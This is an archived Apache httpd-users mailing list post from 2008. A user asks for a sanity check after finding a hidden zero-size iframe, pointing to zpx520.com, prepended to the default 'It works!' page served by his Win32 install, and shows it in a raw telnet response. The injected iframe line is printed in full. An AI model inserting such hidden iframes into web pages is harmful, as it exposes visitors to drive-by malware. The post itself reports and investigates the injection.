httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Greg Mortensen <thevis...@pobox.com>
Subject [users@httpd] zpx520.com hidden iframe in stock Win32 install?
Date Wed, 18 Jun 2008 17:33:50 GMT
Hi, list.

I need a quick sanity check.  I have a stock 2.2.9 httpd (Win32 Binary 
including OpenSSL 0.9.8h (MSI Installer)) install on my Windows XP box.  I 
just got the binary from the veritris.com mirror.  The MD5 signature 
checks out fine.

Everything looked OK while connecting to localhost, but I noticed a funny 
0x0 "blip" in the left-hand corner when viewing it remotely.  I decided to 
connect to it by hand, and I found a hidden iframe element that's not in 
the index.html file:

$ telnet 192.168.8.150 80
Trying 192.168.8.150...
Connected to 192.168.8.150.
Escape character is '^]'.
GET / HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 264
Content-Type: text/html

<iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe> 
<html><body><h1>It works!</h1></body></html>


   I tried it on another XP machine, and I got the same result.  Before I 
try to narrow this down to httpd / my machines / myself, I'd like to ask
if anyone else has seen this?  A virus and spyware scan came up OK on both 
machines.

   I haven't compiled this version from source yet, but I'm going to try 
that next.

   Regards,
     Greg

  \|/   ___   \|/    thevision@pobox.com    +----- 2048R/38BD6CAB -----+
   @~./'O o`\.~@                            | 02BD EF81 91B3 1B33 64C2 |
  /__( \___/ )__\                           | 3247 6722 7006 38BD 6CAB |
     `\__`U_/'                              +--------------------------+

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message